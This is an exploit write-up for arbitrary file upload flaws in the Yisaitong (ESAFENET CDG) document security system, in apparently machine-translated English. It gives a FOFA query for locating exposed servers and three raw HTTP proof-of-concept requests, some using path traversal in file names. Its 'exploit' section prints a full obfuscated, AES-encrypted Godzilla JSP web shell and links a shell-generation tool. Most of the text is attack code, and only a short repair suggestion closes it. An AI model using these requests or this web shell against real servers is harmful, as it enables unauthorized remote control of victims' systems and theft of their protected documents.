0x01 Product Introduction
Yisaitong electronic document security management system (abbreviation: CDG) is an electronic document security encryption software. This system uses the driver layer transparent encryption technology to protect the electronic document by encrypting it to prevent internal employees from leaking secrets and external personnel from illegally stealing the core of the enterprise. Important data assets, full life cycle protection for electronic documents, the system has multiple encryption methods such as transparent encryption, active encryption, intelligent encryption, etc. Users can deploy according to the different degrees of confidentiality of departments (such as core departments and ordinary departments). Different gradient document encryption protection realizes the organic combination of technology, management and auditing, builds a three-dimensional overall information leakage prevention system internally, balances cost, efficiency and security, and realizes data security of electronic documents .
0x02 Vulnerability Overview
There are arbitrary file upload vulnerabilities in UploadFileFromClientServiceForClient, /CDGServer3/DecryptApplicationService2, /CDGServer3/fileType/importFileType.do and other interfaces of Yisaitong electronic document security management system. Unauthorized attackers can upload malicious backdoor files through this vulnerability to gain access to the server authority.
0x03 range of influence
Global impact (10,000 levels)
0x04 Recurrence environment
FOFA: app="Yisaitong-Electronic Document Security Management System"
0x05 Vulnerability Reappearance
PoC-1
POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
文件内容practice:
PS: After uploading, you can access tttT.jsp in the root directory
PoC-2
POST /CDGServer3/DecryptApplicationService2?fileId=../../../Program+Files+(x86)/ESAFENET/CDocGuard+Server/tomcat64/webapps/CDGServer3/a.jsp HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
文件内容practice:
verify url
https://your-ip/CDGServer3/a.jsp 
PoC-3
POST /CDGServer3/fileType/importFileType.do?flag=syn_user_policy HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept-Encoding: gzip, deflate
Accept: */*
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Connection: close
Content-Length: 212
Content-Type: multipart/form-data; boundary=a6c1544109e610dc4bddfc7583725f9c
--a6c1544109e610dc4bddfc7583725f9c
Content-Disposition: form-data; name="fileshare"; filename="/..\\..\\..\\..\\webapps\\ROOT\\a.jsp"
文件内容
--a6c1544109e610dc4bddfc7583725f9c--practice:
Direct Access to Root Directory Verification
exploit
Spawn Godzilla Free Horse
Tool address: https://github.com/Tas9er/ByPassGodzilla
try to upload
POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
<%! String govsb_NQ = "c1976fc471d32d0b";
String govsb_rRDYrq62F = "Tas9er";
class govsb_yYcq09pP504Xb extends /*edusb_Yd*/ClassLoader {
public govsb_yYcq09pP504Xb(ClassLoader govsb_vLM8) {
super/*edusb_QST55l*/(govsb_vLM8);
}
public Class govsb_qvs(byte[] govsb_pHH5nFhGBGJrs) {
return super./*edusb_9lA81*/\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073/*edusb_vZLmO*/(govsb_pHH5nFhGBGJrs, 1099931-1099931, govsb_pHH5nFhGBGJrs.length);
}
}
public byte[] govsb_VA(byte[] govsb_RDLs5gMnLdx7, boolean govsb_FJ1cLOh5) {
try {
j\u0061\u0076\u0061\u0078./*edusb_yyAR3cHFdavJGU*/\u0063\u0072\u0079\u0070\u0074\u006f.Cipher govsb_Bsa1 = j\u0061\u0076\u0061\u0078.\u0063\u0072\u0079\u0070\u0074\u006f.Cipher.\u0067\u0065\u0074\u0049\u006e\u0073\u0074\u0061\u006e\u0063e/*edusb_ugUsn1*/("AES");
govsb_Bsa1.init(govsb_FJ1cLOh5?1099931/1099931:1099931/1099931+1099931/1099931,new j\u0061\u0076\u0061\u0078.\u0063\u0072\u0079\u0070\u0074\u006f.spec./*edusb_AD7*/SecretKeySpec/*edusb_qvGt5qn*/(govsb_NQ.getBytes(), "AES"));
return govsb_Bsa1.doFinal/*edusb_f5*/(govsb_RDLs5gMnLdx7);
} catch (Exception e) {
return null;
}
}
%><%
try {
byte[] govsb_tby6ZYM2tmeJCk = java.util.Base64./*edusb_Hr5K*/\u0067\u0065\u0074\u0044\u0065\u0063\u006f\u0064\u0065\u0072()./*edusb_Wty*/decode(request.getParameter(govsb_rRDYrq62F));
govsb_tby6ZYM2tmeJCk = govsb_VA(govsb_tby6ZYM2tmeJCk,false);
if (session.getAttribute/*edusb_7*/("payload") == null) {
session.setAttribute("payload", new govsb_yYcq09pP504Xb(this.\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073()./*edusb_RqwVLvZTZBVeCp3*/\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073Loader())/*edusb_V6FRLkLW*/.govsb_qvs(govsb_tby6ZYM2tmeJCk));
} else {
request.setAttribute("parameters", govsb_tby6ZYM2tmeJCk);
java.io.ByteArrayOutputStream govsb_3 = new java.io./*edusb_v9iBBl*/ByteArrayOutputStream();
Object govsb_YCJ = /*edusb_xLTC*/((Class) session.getAttribute("payload"))./*edusb_Invmf*//*edusb_8Q5Mk*/new\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065()/*edusb_lSK4DHyA*/;
govsb_YCJ.equals(govsb_3);
govsb_YCJ.equals(pageContext);
response.getWriter().write("9D0C38EF2C63233C8BB491A19883F59F".substring(1099931-1099931, 16));
govsb_YCJ.toString();
response.getWriter().write(java.util.Base64/*edusb_Qz*/.getEncoder()/*edusb_P9Bzr0TBcIv7y*/.encodeToString(govsb_VA(govsb_3.toByteArray(),true)));
response.getWriter().write("9D0C38EF2C63233C8BB491A19883F59F".substring(16));
}
} catch (Exception e) {
}
%>
try to connect
0x06 Repair suggestion
The system has many upload points, it is recommended to add access authentication to the relevant interface and set the security group to only open to trusted addresses
In addition, the official website has released a security repair version, please upgrade to the latest version on the official website to fix this vulnerability
https://www.esafenet.com/